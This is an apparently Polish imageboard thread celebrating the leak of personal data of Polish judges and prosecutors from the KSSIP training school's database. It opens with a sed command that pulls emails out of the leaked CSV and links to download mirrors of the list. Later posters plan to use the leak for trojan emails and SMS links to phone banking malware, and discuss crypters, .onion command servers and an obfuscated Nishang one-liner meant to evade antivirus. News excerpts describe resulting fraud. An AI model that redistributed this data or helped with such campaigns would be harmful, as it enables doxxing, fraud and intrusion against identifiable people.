Hakerzy i superprzestępcy z was :)


 No.17718

instrukcja w jaki sposób wyeksportować najwięcej emailów (bo nie wszystkie są w kolumnie trzynastej)


sed -r 's/\b[A-Z0-9._%+-][email protected][A-Z0-9.-]+\.[A-Z]{2,4}/\n&\n/ig;s/(^|\n)[^@]*(\n|$)/\n/g;s/^\n|\n$//g;/^$/d' kssip.gov.pl.csv > email.txt

prawdopodobnie najbardziej kompletna lista emailów z tej bazy, niektóre rekordy poprawiałem ręcznie

https://anonfile.com/R62643q0o1/emaile_txt

https://share.dmca.gripe/mLFVTxMVtcD8V3NA.txt

http://bcloud2suoza3ybr.onion/d1/URI:CHK:fbrhor2z7e6gagmwuaqo5ypble:7lq2ij53urm26v3w4p723aabhr24oqmotslwtm6elctvviq2zama:3:10:1396183/emaile.txt

lub jeśli ktoś nie chce pobierać, w dwóch częściach bo za długie

http://depastedihrn3jtw.onion/show.php?md5=8b9db15dbef1ae5cf90d7fb6474458d8

http://depastedihrn3jtw.onion/show.php?md5=fb5fda5f18f92706aa52c96e169d5c0a


 No.17721

>>17718

Nie odpalać tej instrukcji policjanta! Rozwala bezpieczeństwo systemu! Ułatwia wprowadzenie trojana!


 No.17730

>>17718

na początku jest trochę błędnych linii, może wykasować te w których jest ,emailadmin,


 No.17732


 No.17733

File: 1587162370362.jpg (504.14 KB, 1280x685, 256:137, screenshot.41.jpg)

To zrzut, przynajmniej jeśli nie jest możliwe zidentyfikowanie ciągów mieszających, będę mieć świetną polską listę nazw dla listy słów ..


 No.17750

Ilość polskich celów pozyskanych przez WIELU ruskich operatorów "polskiego" lolifoksa: KILKA.

Ilośc ruskich celów rozpracowanych przez JEDNEGO polskiego hakera: TYSIĄCE.

Młodzi ludzie!

Zdecydujecie czy jesteście Polakami czy ruskimi kurwami! Nie atakuje się swoich! Dołączcie do rozwalania ruskich celów dostarczonych wam na tacy przez Macieja i Vegetę. Czas odpłacić za Katyń i Smoleńsk!


 No.17751

>>17750

ja tam wolę niszczyć polskie państwo


 No.17752

>>17751

Bo jesteś ruskim żulem.


 No.17753

za dude morawieckiego i pana prezesa Kaczyńskiego - 3 krotne cześć i chwała bohaterą (om)


 No.17759

A na jesienni zamiast lści będą(om) wisieć komuniści


 No.17760

>>17757

Nie mamy zamiaru was zabijać. Będziecie naszymi dojnymi krowami, zdobędziemy wszystkie wasze pieniądze, skupiając się na tych o nielegalnym pochodzeniu, by nie przyszło wam do głowy zgłaszać kradzieży do organów ściagnia :)


 No.17761

A na jesienni zamiast lści będą(om) wisieć komuniści


 No.17769

>Czas odpłacić za Katyń

I żyjący teraz Rosjanie mają mieć wykradzione dane bo ktoś inny z ich narodu kiedyś mordował niewinnych? Puknij się w głowę.


 No.17770

>I żyjący teraz Rosjanie mają mieć wykradzione dane bo ktoś inny z ich narodu kiedyś mordował niewinnych? Puknij się w głowę.

po pierwsze: dane maja wykradzione i z tego co widac nie malo

po drugie: ich rzad robi to samo, niech podziekuja kurwie balasowi Putinowi

po trzecie: rosja jest BARDZO zle zabezpieczona, raj na ziemi,

po czwarte: w chuj mniejszy przypal walac za granica, polska policja nie radzi sobie u nas, na pewno nei beda chcieli kolaborowac z rosja w celu ujecia zlodziei, bo polski rzad pierdoli putina w srodek chorej dupy


 No.17771

>>17769

Jacy niewinni, Misha? Okradać będziemy tylko ruskich cyberprzestępców za którymi zawsze stoją wasze ruskie służby :)


 No.17773


 No.17780

A na jesienni zamiast lści będą(om) wisieć komuniści


 No.17783

b


 No.17787

A na jesienni zamiast lści będą(om) wisieć komuniści


 No.17788

>te wysrywy prawackie itt


 No.17789

>>17788

to ruskie piszą żeby odreagować klęski


 No.17794

A na jesienni zamiast lści będą(om) wisieć komuniści


 No.17795

A na jesienni zamiast lści będą(om) wisieć komuniści


 No.17797

A na jesienni zamiast lści będą(om) wisieć komuniści


 No.17798

za dude morawieckiego i pana prezesa Kaczyńskiego - 3 krotne cześć i chwała bohaterą (om)


 No.17826

>>17750

>Ilość polskich celów pozyskanych przez WIELU ruskich operatorów "polskiego" lolifoksa: KILKA.

ja mam jeszcze 250 polskich baz danych i mogę wrzucić w odpowiednim momencie


 No.17855

>ja mam jeszcze 250 polskich baz danych i mogę wrzucić w odpowiednim momencie

Szkoda twojego czasu, kacapie. Wasza lodówka została zdemaskowana, możesz nie udawać Polaka. Nikt nie połakomi się na twoje spleśniałe wycieki.


 No.17951

File: 1587231148284.png (41.88 KB, 683x880, 683:880, niebezpiecznik.png)

jak myślicie, czy mój komentarz pojawi się niebawem?


 No.17953

>>17951

>jak myślicie, czy mój komentarz pojawi się niebawem?

mało prawdopodobne


 No.17968


 No.18421

https://zaufanatrzeciastrona.pl/post/sezon-wyciekow-polskich-baz-danych-i-hasel-uzytkownikow-uwazamy-za-otwarty/

Z punktu widzenia kryptoanalizy najciekawszy jest przypadek serwisu KSSIP.GOV.PL. Kilka dni temu jako pierwsi ujawniliśmy fakt, że baza serwisu została opublikowana na publicznie dostępnym forum. W bazie znajdują się dane 50 284 kont wraz z haszami ich haseł. Przez krótką chwilę pocieszające było to, że hasła były solone (technicznie rzecz biorąc, nie była to sól, która powinna być unikatowa dla każdego hasła, a tzw. pieprz, który nie będąc przechowywany w bazie, miał utrudnić łamanie haseł). Niestety okazuje się, że sól (czy też pieprz) można odzyskać. Zdecydowanie nie jest to operacja trywialna i wymaga wiedzy kryptoanalitycznej, jednak jest wykonalna. Może o tym świadczyć fakt, że około połowy haseł z bazy KSSIP udało się złamać (czy też zgadnąć) w czasie krótszym niż doba. Nie jest to dobra wiadomość dla osób, których dane znalazły się w tym wycieku.


 No.18433

ktoś ma bazę exerion.pl o której piszą na zaufanatrzeciastrona.pl?


 No.18451

>>18433

>ktoś ma bazę exerion.pl o której piszą na zaufanatrzeciastrona.pl?

jest dostępna tutaj https://raidforums.com/Thread-Exerion-pl

dostęp kosztuje 8 euro

rozmawialiśmy o tym w temacie >>17633

ja nie potrzebuję tej bazy, ale mogę zapłacić żeby zrobić na złość polskiej policji jebanej kurwie


 No.18473

> okazuje się, że sól (czy też pieprz) można odzyskać. Zdecydowanie nie jest to operacja trywialna i wymaga wiedzy kryptoanalitycznej, jednak jest wykonalna

Ktoś wie jaka to metoda?


 No.18482

>>18473

Nie używano HMAC, tylko zwykłego hashu tworzącego prymitywny "MAC". To pierwszy błąd.

Pieprz był malutki. To drugi błąd.

Atak był trywialny.


 No.18488

>>18486

A kolega przypadkiem z kimś mnie nie pomylił? Z góry proszę o wybaczenie, jeśli jestem podobny do kogoś tutaj nielubianego.


 No.18495

>>18489

Bardzo jestem zawiedziony lenistwem bywalców tej strony. Kombinowane ataki siłowo-adaptacyjne i ataki typu "length extension" są szeroko znane jako standardowe techniki atakowania niedopracowanych funkcji MAC.

Jest oczywiste, że skoro developer kodu zhakowanej strony popełnił kardynalne błędy implementacyjne, te właśnie ataki zostaną użyte.

Jako "dowód" (czyli coś, co jak zwykłem określać jako bibliografię) proponuję przystępny tekst Nate Lawsona z 29 października 2009 roku, "Stop using unsafe keyed hashes, use HMAC"


 No.18499

>>18495

>Bardzo jestem zawiedziony lenistwem bywalców tej strony. Kombinowane ataki siłowo-adaptacyjne i ataki typu "length extension" są szeroko znane jako standardowe techniki atakowania niedopracowanych funkcji MAC.

>Jest oczywiste, że skoro developer kodu zhakowanej strony popełnił kardynalne błędy implementacyjne, te właśnie ataki zostaną użyte.

>Jako "dowód" (czyli coś, co jak zwykłem określać jako bibliografię) proponuję przystępny tekst Nate Lawsona z 29 października 2009 roku, "Stop using unsafe keyed hashes, use HMAC"

no i zostałeś zdemaskowany jako patologiczny kłamca i oszust, wystarczył jeden post


 No.18509

>>18499

Uprzejmie, aczkolwiek z pewnym rozbawieniem, pozwolę sobie jednak zaprzeczyć, ze w jakikolwiek sposób zostałem 'zdemaskowany jako patologiczny kłamca'. Wskazana przeze mnie literatura jest publicznie dostępna, podobnie jak liczne prace przyczynkarskie opisujące stosowanie tej klasy ataków do 'deszyfrowania' hashowanych haseł.

Zarzucając mi kłamstwo, wypada wskazać bibliografię dowodzącą nieprawdziwości źródeł na jakie ja się powołuję.


 No.18513

>>18509

>Uprzejmie, aczkolwiek z pewnym rozbawieniem, pozwolę sobie jednak zaprzeczyć, ze w jakikolwiek sposób zostałem 'zdemaskowany jako patologiczny kłamca'. Wskazana przeze mnie literatura jest publicznie dostępna, podobnie jak liczne prace przyczynkarskie opisujące stosowanie tej klasy ataków do 'deszyfrowania' hashowanych haseł.

>Zarzucając mi kłamstwo, wypada wskazać bibliografię dowodzącą nieprawdziwości źródeł na jakie ja się powołuję.

debilu, masz pokazać jaki związek ma twoja bibliografia z bazą KSSIP xD


 No.18514

>>18513

To wskazałem w moim poście >>18482


 No.18518

>>18514

>To wskazałem w moim poście >>18482

nic nie pokazałeś, kłamco i oszuście


 No.18520

Prokuratura Krajowa: zatrzymano podejrzanego o spowodowanie wycieku danych z Krajowej Szkoły Sądownictwa i Prokuratury

To Krzysztof J., pracownik spółki zewnętrznej zarządzającej serwerami - poinformowała rzecznik Prokuratury Krajowej Ewa Bialik.

Jak zapewniła prok. Bialik, Krzysztof J. usłyszy zarzut udostępnienia danych umożliwiających nieuprawniony dostęp do informacji przechowywanych w systemie informatycznym KSSiP. Grozi za to do pięciu lat pozbawienia wolności.

Jak ustalili śledczy, Krzysztof J. w trakcie testowego migrowania danych szkoły na nową platformę utworzył katalog, do którego przeniósł dane osobowe pracowników wymiaru sprawiedliwości, zapisane w systemie informatycznym KSSiP.

Chodzi o imiona, nazwiska, adresu mailowe i numery telefonów, które pracownicy przekazywali KSSiP w celu uzyskania dostępu do internetowej platformy szkoleniowej prowadzonej przez uczelnię.

Jak przekazała prokuratura, Krzysztof J. nadał następnie katalogowi uprawnienia publiczne, tym samym umożliwił pobranie danych z katalogu dowolnej osobie, mającej dostęp do internetu. "Pliki te zostały pobrane przez dotychczas nieustalone osoby i zamieszczone w serwisach internetowych umożliwiających przechowywanie danych" - przekazała prok. Bialik.

O sprawie poinformowała w ubiegłym tygodniu m.in. "Gazeta Wyborcza". Jak podał dziennik, do internetu wyciekły dane tysięcy sędziów i prokuratorów, które miała w swoich zasobach Krajowa Szkoła Sądownictwa i Prokuratury w Krakowie. W sieci pojawiły się prywatne adresy mailowe, adresy zamieszkania, numery telefonów, a także hasła logowania. Śledztwo w tej sprawie prowadzi lubelska prokuratura regionalna.

https://wiadomosci.onet.pl/kraj/prokuratura-zatrzymanie-ws-wycieku-danych-z-kssip/m6t3hej


 No.18521

>>18518

Jest mi naprawdę przykro, że niewiedza i niekontrolowane emocje nie pozwalają Ci na skuteczne skorzystanie z wiedzy jaką tutaj przekazałem. Mam nadzieję, że inni użytkownicy nie będą mieli podobnych ograniczeń poznawczych lub emocjonalnych problemów.


 No.18522

>>18521

>Jest mi naprawdę przykro, że niewiedza i niekontrolowane emocje nie pozwalają Ci na skuteczne skorzystanie z wiedzy jaką tutaj przekazałem. Mam nadzieję, że inni użytkownicy nie będą mieli podobnych ograniczeń poznawczych lub emocjonalnych problemów.

twoja wiedza jest śmieciana, gówniana, gdybym teraz próbował złamać te hashe to robiłbym dokładnie odwrotnie niż to co sugerujesz


 No.18523

>>18522

W takim razie zrób to i pochwal się, jak ci poszło. Bardzo szybko zostaniesz zmuszony do przyznania mi racji. Matematyka jest matematyką i Twoje poglądy nie zmienią tego, co z matematyki wynika. Mam nadzieję, że takie doświadczenie będzie dla Ciebie pouczającą i interesującą nauką.


 No.18529

Ciekawe czy naprawdę kogoś zatrzymali. Może to wrzutka w celu zwalenia odpowiedzialności na firmę zewnętrzną, żeby nie pokazać jaki syf jest w państwowym IT…


 No.18532

>>18529

>Ciekawe czy naprawdę kogoś zatrzymali

znając tych idiotów policyjnych to tak

>Może to wrzutka w celu zwalenia odpowiedzialności na firmę zewnętrzną, żeby nie pokazać jaki syf jest w państwowym IT…

na pewno, na jednego kozła ofiarnego


 No.18564

>>18421

>Może o tym świadczyć fakt, że około połowy haseł z bazy KSSIP udało się złamać (czy też zgadnąć) w czasie krótszym niż doba.

gdzie są te hasła?

>>18532

>znając tych idiotów policyjnych to tak

te głupki zatrzymywały też już wielu "lolifoksów"


 No.18567

>>18564

>gdzie są te hasła?

trzeba przekonać Adama Haertle żeby nam pokazał

>te głupki zatrzymywały też już wielu "lolifoksów"

ale tym razem jest napisane kogo zatrzymali, informatyka który zarządzał bazą XD


 No.18611

bodnar powiadomił abw ws wycieku będą ustalać kto to pobrał


 No.18612

>>18611

>bodnar powiadomił abw ws wycieku będą ustalać kto to pobrał

hahahahah to zobaczymy czy potrafią złamać Tora


 No.18613


 No.19134

przypominam o wycieku. można się zabawić


 No.19265

File: 1588122439464-0.jpg (48.53 KB, 540x960, 9:16, a.jpg)

File: 1588122439464-1.jpg (49.51 KB, 720x862, 360:431, b.jpg)

File: 1588122439464-2.gif (18.89 KB, 126x150, 21:25, c.gif)

https://tvn24.pl/polska/efekt-wycieku-danych-ze-szkoly-dla-prawnikow-4557117

https://www.facebook.com/sedziowie/posts/2965340480178990

Przestępcy zaczęli polować na sędziów i prokuratorów. Efekt wycieku ze szkoły prawników

Ktoś przejął i wykorzystał do oszustwa konto w mediach społecznościowych, posługując się danymi skradzionymi z bazy Krajowej Szkoły Sądownictwa i Prokuratury. Niektórzy prawnicy, których dane zostały skradzione, są nękani telefonami z zagranicy. Śledczy przyznają, że to dopiero początek negatywnych skutków wycieku danych polskich sędziów i prokuratorów.

Przypomnijmy – do kradzieży danych w KSSiP doszło w lutym, jednak szkoła zdała sobie z tego sprawę dopiero na początku kwietnia. Z serwerów KSSiP skradziono dane ponad 50 tysięcy osób związanych z wymiarem sprawiedliwości i organami ścigania, przede wszystkim sędziów i prokuratorów.

Pierwsze oszustwa

Stowarzyszenie Sędziów Polskich Iustitia poinformowało w swoich mediach społecznościowych, że doszło do pierwszych oszustw, do których sprawca wykorzystał wykradzioną bazę danych KSSiP.

Ofiarą jest kobieta, która korzystała ze szkoleń w Krajowej Szkole Sądownictwa i Prokuratury. Oszust miał wykorzystać informacje, które były m.in. w wykradzionej bazie, do przejęcia jej profilu w mediach społecznościowych. Później, podszywając się pod nią, wysyłał wiadomości do jej znajomych, prosząc o szybki przelew, bo rzekomo chwilowo nie ma dostępu do swojego konta.

- Zaczęłam dostawać wiadomości od rodziny i przyjaciół, że chyba mam zawirusowany komputer, bo dostają dziwne wiadomości - mówi poszkodowana kobieta, która pragnie zachować anonimowość. - Niestety zanim zorientowałam się, co się naprawdę wydarzyło i poinformowałam wszystkich, dwie osoby już zdążyły zrobić przelewy - dodaje.

Sam oszust nie ukrywał, jak udało mu się włamać na konto kobiety. - Początkowo myśleliśmy, że to jakiś bot, ale część znajomych zaczęła z nim pisać na komunikatorze i ewidentnie widać, że po drugiej stronie była jakaś żywa osoba - mówi poszkodowana. - W jednej z rozmów (ta osoba) sama przyznała, że ma dane z bazy KSSiP - dodaje.

Egzotyczne telefony

Skutki kradzieży danych sędziów, prokuratorów i adwokatów odczuła już na swojej skórze rodzina Jarosława Gwizdaka, prawnika, byłego sędziego, członka zarządu Instytutu Prawa i Społeczeństwa. - Do krewnego, który często uczestniczył w szkoleniach KSSiP, po trzy, cztery razy dziennie wydzwaniają nieznane numery z tak egzotycznych miejsc jak Nauru, Samoa czy z Cypru. Telefony zaczęły się na początku kwietnia - mówi Gwizdak. - Na razie uciążliwość tego nie jest duża, ta osoba nie odbiera tych telefonów, bo wie, że to próba oszustwa. Ale na co dzień jest sędzią, orzeka w sprawach skonfliktowanych rodzin. I wolę nie myśleć, co się stanie, jeśli jej dane wpadną w ręce jakiejś rozgoryczonej strony procesu - stwierdza Gwizdak.

On sam też uczestniczył w szkoleniach organizowanych przez szkołę. - W związku z tym dowiedziałem się, jak wszyscy pokrzywdzeni, żeby zgłosić sprawę na policję i sprawdzać informację na swój temat w Biurze Informacji Kredytowej - mówi były sędzia. I zapewnia, że jeśli z powodu kradzieży swoich danych poniesie jakieś straty, to pozwie za to Skarb Państwa.

Telefony z egzotycznych państw dzwonią też do innych osób, których dane znalazły się w pechowym pliku. To klasyczna próba oszustwa. Przestępcy liczą, że właściciel telefonu oddzwoni na szybko rozłączający się numer i w ten sposób połączy się z usługą premium, co może kosztować kilkadziesiąt złotych za kilka sekund rozmowy. Takie telefony mogą być problemem dla 10 tysięcy prawników spośród 50 tysięcy osób, których dotyczy wyciek danych. Dlaczego 10 tysięcy? Bo numery tylu osób znalazły się w skradzionej bazie.

Baza dostępna za 7 dolarów

Zarówno KSSiP, jak i Urząd Ochrony Danych Osobowych zapewniają, że podejmują wszystkie możliwe kroki, aby zablokować dalsze rozprzestrzenianie się danych.

Jak sprawdziliśmy jednak, baza nadal jest dostępna w internecie. Co więcej, ciągle jest wystawiona na sprzedaż, a dostęp do niej można kupić za… 7 dolarów.

- Wszyscy twierdzą, że zrobili, co do nich należało - KSSiP, UODO, prokuratura, ministerstwo - tyle tylko, że te informacje cały czas hulają po internecie i można je sobie swobodnie kupić - mówi oburzony prof. Krystian Markiewicz, prezes Stowarzyszenia Sędziów Polskich Iustitia. - Zgodnie ze starym żartem: operacja się udała, pacjent zmarł - dodaje.


 No.19266

Ktoś na tym zarabia

W sprawie wycieku danych wszczęto śledztwo. Ale sprawa kradzieży mocno zbulwersowała środowisko sędziów i prokuratorów. Zwłaszcza że według naszych rozmówców, jej poważne skutki dopiero przed nami. - Dziś widać, że z powodu braku szybkiej reakcji szkoły, jak i służb, nasze dane rozlały się po internecie. Ich usunięcie z różnych stron, gdzie kontaktują się ze sobą cyberprzestępcy, będzie już praktycznie niemożliwe - przyznaje w rozmowie z tvn24.pl śledczy proszący o anonimowość. Jego kolega zwalczający cyberprzestępczość również nie jest optymistą:

W plikach, które można znaleźć w sieci, nie ma najbardziej wrażliwych danych na nasz temat. A znajdowały się one w formularzach zbieranych przez KSSiP. Obawiam się, że ktoś zarabia na nich właśnie duże pieniądze, sprzedając je w darknecie (w uproszczeniu: części sieci niewidocznej dla dużych przeglądarek internetowych, pozwalającej na anonimowość).

Prokuratorzy nie mogą zrozumieć, po co na stronie szkoły zbierano tak wiele danych na ich temat, skoro i tak te dane posiada Ministerstwo Sprawiedliwości. W formularzu KSSiP trzeba było wypełnić m.in. informacje dotyczące numeru PESEL, telefonu, dokładnego adresu. - Jeśli dodamy do tego, że w publikowanych w sieci oświadczeniach majątkowych znajdują się informacje o miejscowości, gdzie dany sędzia lub prokurator posiada nieruchomość, a wielu z nas mieszka w małych miejscowościach pod miastami, to bandyci mają nas jak na patelni - martwią się śledczy.

Konsekwencji brak

Zapytaliśmy Ministerstwo Sprawiedliwości, czy w związku z kradzieżą danych z KSSiP wyciągnięto konsekwencje wobec dyrektor szkoły lub innych jej pracowników i czy w przyszłości zostaną zmienione procedury przechowywania wrażliwych danych pracowników podległych ministrowi sprawiedliwości i prokuratorowi generalnemu?

"Minister Sprawiedliwości nie widzi powodów do odwołana pani prof. Małgorzaty Manowskiej, która należycie wykonuje obowiązki związane z pełnieniem funkcji Dyrektora Krajowej Szkoły Sądownictwa i Prokuratury. Pani prof. Małgorzata Manowska ma wielki wkład w rozwój tej znakomitej uczelni, kształcącej i wprowadzającej do zawodu nową kadrę wymiaru sprawiedliwości" - przekazał nam zespół prasowy Ministerstwa Sprawiedliwości.

Z informacji ministerstwa wynika, że "okoliczności zdarzenia są przedmiotem prowadzonego przez prokuraturę postępowania przygotowawczego", a "do wycieku danych doszło prawdopodobnie na skutek zaniedbania zewnętrznej firmy, która przeprowadzała testową migrację danych ze starej platformy szkoleniowej KSSiP na nową".


 No.19286

>>19268

>Wygląda jak przesłane pierwszy telegrafem z Mokswy :) Pokaż źródła

są przecież

artykuł z https://tvn24.pl/polska/efekt-wycieku-danych-ze-szkoly-dla-prawnikow-4557117

obrazki zalinkowane w artykule z https://www.facebook.com/sedziowie/posts/2965340480178990

>>19269

>Jako obserwator skłaniam się, że Vegeta ma racje

pisanie czego takiego o sobie… jak można być tak żałosnym człowiekiem?

>Próbowałem na początku łączyć się wedle poradnika dla

>"wyjebkowicza" ale u mnie również proxy odrzuca połączenie

błąd który występuje wyłącznie na komputerze Vegety, stuprocentowe potwierdzenie że to on pisał


 No.19354

>>19265

>Telefony z egzotycznych państw dzwonią też do innych osób, których dane znalazły się w pechowym pliku. To klasyczna próba oszustwa. Przestępcy liczą, że właściciel telefonu oddzwoni na szybko rozłączający się numer i w ten sposób połączy się z usługą premium, co może kosztować kilkadziesiąt złotych za kilka sekund rozmowy.

jakieś szczegóły tego typu oszustwa?

>Jak sprawdziliśmy jednak, baza nadal jest dostępna w internecie. Co więcej, ciągle jest wystawiona na sprzedaż, a dostęp do niej można kupić za… 7 dolarów.

u nas jest za darmo

>- Dziś widać, że z powodu braku szybkiej reakcji szkoły, jak i służb, nasze dane rozlały się po internecie.

polska to państwo z tektury. chuj, dupa i kamieni kupa.

>Ich usunięcie z różnych stron, gdzie kontaktują się ze sobą cyberprzestępcy, będzie już praktycznie niemożliwe - przyznaje w rozmowie z tvn24.pl śledczy proszący o anonimowość. Jego kolega zwalczający cyberprzestępczość również nie jest optymistą

zapytajmy Łukasza, może ma inną opinię od nich xD

>Jeśli dodamy do tego, że w publikowanych w sieci oświadczeniach majątkowych znajdują się informacje o miejscowości, gdzie dany sędzia lub prokurator posiada nieruchomość, a wielu z nas mieszka w małych miejscowościach pod miastami, to bandyci mają nas jak na patelni - martwią się śledczy.

ale jak namierzyć dokładny adres? popytać ludzi przez facebook?


 No.19357

>>19354

>jakieś szczegóły tego typu oszustwa?

tutaj https://niebezpiecznik.pl/post/uwaga-na-nowy-przekret-nie-oddzwaniaj-do-nikogo-po-takim-sms-ie/

https://niebezpiecznik.pl/post/uwaga-na-gluche-telefony-i-nieodebrane-polaczenia-z-numerow-53-kuba/

Połączenie do Kuby to wedle cennika większości operatorów ostatnia strefa połączeń międzynarodowych i koszt nawet 13 PLN netto za minutę połączenia. I na tym zarabia oszust, który zapewne otrzymuje wynagrodzenie od każdej minuty — bo tak rozliczają się operatorzy — w uproszczeniu, ten z sieci którego inicjowane jest połączenie płaci temu, do w sieci którego połączenie się kończy (por. Termination Rates). https://en.wikipedia.org/wiki/Termination_rates

Rozmowy są wykonywane przez skrypty (boty), które najprawdopodobniej włamują się do niezabezpieczonych centralek VoIP podpiętych do internetu. Z poziomu niektórych z centralek można, przy odpowiednich warunkach, podrobić Caller-ID (czyli numer dzwoniącego) na dowolny. Wybranie prefiksów danego operatora z Kuby nie jest zapewne przypadkowe. Naciągacze otrzymują wynagrodzenie za terminowanie połączeń na numerach tego operatora (tak działają rozliczenia międzyoperatorskie). https://pl.wikipedia.org/wiki/Interconnect

>u nas jest za darmo

zastanawiałem się skąd oni wzięli to 7 dolarów xD trzeba się mocno postarać żeby zapłacić za coś co jest za darmo

>ale jak namierzyć dokładny adres? popytać ludzi przez facebook?

można wpisać w wyszukiwarkę nazwisko i miejscowość

można porównać z bazą zamówień ze sklepów internetowych


 No.19364

może by się dało załatwić dostęp do oświadczeń majątkowych

ale tego dużo będzie, może przez serwer pomocniczy i na nim potem to udostępnić publicznie?

poza tym czy te oświadczenia mają wartość? co można z nimi zrobić? przecież były cały czas publiczne, co zmienia wyciek bazy KSSIP?


 No.19365

>>19364

>poza tym czy te oświadczenia mają wartość? co można z nimi zrobić? przecież były cały czas publiczne, co zmienia wyciek bazy KSSIP?

lepiej coś mocniejszego z bazą zrobić

np.rozesłać email z trojanem

np.rozesłać smsy z linkiem do czegoś


 No.19366

>>19365

>np.rozesłać email z trojanem

myślałem o tym ale na razie nie wiem co to te trojany, muszę jakieś gotowe z githuba

i jak wydawać polecenia tym trojanom? vegeta wydawał przez pastebin, można użyć coś podobnego. ale co jeśli w końcu sprawdzą to ludzie od wirusów i zobaczą skąd bierze polecenia i zamkną albo wydadzą swoje polecenie, odinstalowania?


 No.19367

>>19366

>myślałem o tym ale na razie nie wiem co to te trojany, muszę jakieś gotowe z githuba

takie mogą być. tylko trzeba jeszcze zacryptować crypterem z hackforums

>i jak wydawać polecenia tym trojanom?

z serwera VPS

>vegeta wydawał przez pastebin, można użyć coś podobnego

to raczej nie jest dobry pomysł

>ale co jeśli w końcu sprawdzą to ludzie od wirusów i zobaczą skąd bierze polecenia i zamkną albo wydadzą swoje polecenie, odinstalowania?

serwer może być ukryty za domeną .onion


 No.19368

i może lepiej trojany na telefon typu Cerberus?

wiadomość sms z linkiem

a potem czyszczenie konta bankowego


 No.19369

File: 1588199572735.jpg (30.31 KB, 500x278, 250:139, d06.jpg)

>trzeba jeszcze zacryptować crypterem z hackforums


 No.19384

File: 1588222001963.jpg (62.12 KB, 848x566, 424:283, trzeba.jpg)


 No.19394

hakerzy z lolifox


 No.19464

>>19452

>to formatowanie tekstu

Vegeta przedawkował narkotyki, ciekawe co wziął

>wykrywlane przez wsyzstkie av, chuja tym zrobisz, najwyzej matce wyslesz

dlatego używamy czegoś takiego jak crypter

>aj dzieci dzieci, stub bedzie wykrywalny

dlatego używamy czegoś takiego jak crypter

>tam trzymasz tylko payloady

na serwerze C&C trzymasz oprogramowanie serwera

>ale jezeli poleceniem bedzie nawiazania polaczenia to przeciez mongole jebany musisz je na cos przyjac

przyjmiemy połączenia na serwer C&C

>c&c na pastebinie to wyjebany pomysl a nie dobry

nie rozumiem o co ci chodzi, serwer na Pastebinie to fatalny pomysł

>ty mongole zajebany, panel c&c mozesz schowac za torem ale klient bedzie pytal o clearntetowa domene/adres

klient może mieć oprogramowanie Tor i pytać o domenę .onion, nic nie stoi na przeszkodzie

>Hakerka to nie wysylanie alramow bombowych

nikt czegoś takiego nie sugerował. wysyłanie alarmów bombowych to cyberterroryzm, a nie hacking

>dla najglupszych

to ciekawe że grupy zadaniowe KWP, KGP, CBŚP, ABW nie potrafią namierzyć "najgłupszych"

>Sie w koncu okaze ze to robert sam te alarmy nadawal

nie ma kogoś takiego jak Robert, to pseudonim Łukasza Jędrzejczaka


 No.19465

>dlatego używamy czegoś takiego jak crypter

Na pierwszy rzut oka widać, że nie masz żadnej praktyki z malware i że w życiu nie pracowałeś ze złośliwym kodem. Gdybys wiedział cokolwiek na ten temat, to nie pierdolnąłbyś się z taką wpadką, jak reklamowanie "cryptera".

Wyjaśnię ci teraz tępy mongole dlaczego pierdolisz jak potłuczony. Otóż crypter to tylko szyfrowanie maskujące sygnaturę właściwego payloadu. Warstewka szyfrowanka narzuicona na właściwą binarkę. Kiedy "crypter" skończy swoją prostacką robotę, payload znowu jest wystawiony jak na tacy: czy to w pamięci operacyjnej czy to na dysku. I wtedy dopada go antywirus i zabawa z hakera się kończy.

Nawet takie podstawy nie są tobie znane, konfabulujący pajacu.


 No.19468

>>19465

>I wtedy dopada go antywirus i zabawa z hakera się kończy.

chyba kpisz xD


 No.19469

>chyba kpisz xD

Nie kpię, teoretyku z zerowym doświadczeniem.


 No.19470

>>19469

>Nie kpię, teoretyku z zerowym doświadczeniem.

ty za to masz doświadczenie, we wrzucaniu malware wykrywanych przez 21/60 antywirusów xD


 No.19472

>ty za to masz doświadczenie, we wrzucaniu malware wykrywanych przez 21/60 antywirusów xD

To był decoy. Właściwego payloadu nie wykrył nikt z was ani żaden AV.


 No.19473

>>19472

>To był decoy. Właściwego payloadu nie wykrył nikt z was ani żaden AV.

xDDDDDDDDDDDDDD


 No.19478

>xDDDDDDDDDDDDDD

Uzyłem cryptera…


 No.19480

>>19478

>Uzyłem cryptera…

cryptery z hackforums działają tylko na windows, czyli nam nie grożą


 No.19484

—–BEGIN PGP SIGNED MESSAGE—–

Hash: SHA512

Prosze sie pode mnie nie podszywac drogie dzieci i panowie policjanci.

W gwoli wyjasnienia:

C&C na pastebienie? Klient tora na kazdym zainfekowanym kompie?

Crypter na chujowy kod z githuba? xDDDDDd

Co wy dzieci gadacie za bzdury?

>To był decoy. Właściwego payloadu nie wykrył nikt z was ani żaden AV.

de…. co? to zwykly oneliner od nishanga, lekko zaobfuskowany,

zeby przelecial przez windowsa defendera, yandexa i avasta,

Wszyscy sie chyba za duzo hackforums i podbnych nczytaliscie.

Sami hakerzy. xD niewiadomo ktorzy glupsi

Przeciez na lolifox nigdy nikt niw rzucil nic wlasnorecznie zajebanego

oprocz Maciula wiec o czym wy w ogole mowicie wszyscy?

Przestawili sie z bombiarzy na hekerow xD to juz lepsi byliscie jako bombiarze xD

tacy bardziej autentyczni sie wywawaliscie jak o tym mowiliscie xD znacyz jak mowiels

—–BEGIN PGP SIGNATURE—–

iQETBAEBCgB9FiEEdkePr+T8OnYM3UyACVTIwtMKCJYFAl6rHgpfFIAAAAAALgAo

aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDc2

NDc4RkFGRTRGQzNBNzYwQ0RENEM4MDA5NTRDOEMyRDMwQTA4OTYACgkQCVTIwtMK

CJYGMQQAk+M3fsLSaj2hroci47pC9glE7Nnn6U0QVBSbFV/xYVZAmdfrRqXWEoOI

ZXF3Unj9mBsj4jG0jqxacdxz+g0yitZfqHwgHmmI893dFBRnFng5onwZTVBlNncG

pS2esD1isX94l5lw3SPyZfKN8w5FhkAuVkKIkA24eQDSqF+qVnM=

=06fr

—–END PGP SIGNATURE—–


 No.19485

>cryptery z hackforums działają tylko na windows, czyli nam nie grożą

Nie używałem żadnego gówna. Użyty przeze mnie złośliwy kod to poliglot, podobnie jak polimorficzny crypter.


 No.19486

>cryptery z hackforums działają tylko na windows, czyli nam nie grożą

fingerprinty zebrane przecza tej teorii, na pcsg znajdziesz dump, nikt nie uzywa wirtualek ani whonixa, najczesciej google chrome


 No.19489

>>19484

>Prosze sie pode mnie nie podszywac drogie dzieci i panowie policjanci.

nikt się nie podszywa, wszystkie twoje posty można rozpoznać po stylometrii

